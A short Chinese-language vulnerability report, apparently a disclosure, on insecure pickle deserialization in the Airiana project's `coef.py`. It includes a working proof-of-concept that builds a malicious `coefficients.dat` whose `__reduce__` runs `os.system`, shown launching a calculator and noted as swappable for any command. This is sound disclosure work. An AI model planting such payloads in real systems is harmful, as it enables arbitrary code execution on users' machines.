### 关键信息 #### 漏洞描述 - **漏洞类型**: 不安全的反序列化(Insecure Deserialization) - **影响**: 通过 `pickle.load()` 导致远程代码执行(RCE) #### 漏洞原因 - 脚本从 `coefficients.dat` 文件中加载数据,使用 Python 的 `pickle.load()` 方法。 - 未验证文件内容,允许攻击者通过替换 `.dat` 文件为恶意负载来执行任意代码。 #### 漏洞代码 ```python file = open("coefficients.dat", "rb") a = pickle.load(file) ``` #### 复现步骤 1. 克隆仓库: `git clone https://github.com/BeamCtrl/Airiana` 2. 进入目录: `cd Airiana` 3. 创建恶意 `coefficients.dat` 文件: ```python import pickle import os class Evil: def __reduce__(self): return (os.system, ("gnome-calculator",)) # 替换为任意系统命令 payload = pickle.dumps(Evil()) with open("coefficients.dat", "wb") as f: f.write(payload) ``` 4. 运行易受攻击的脚本: `python3 coef.py` 5. 观察结果: 计算器或其他任意系统命令将被执行。 #### 证据 - 提供了一个视频记录,显示了计算器被启动的情况。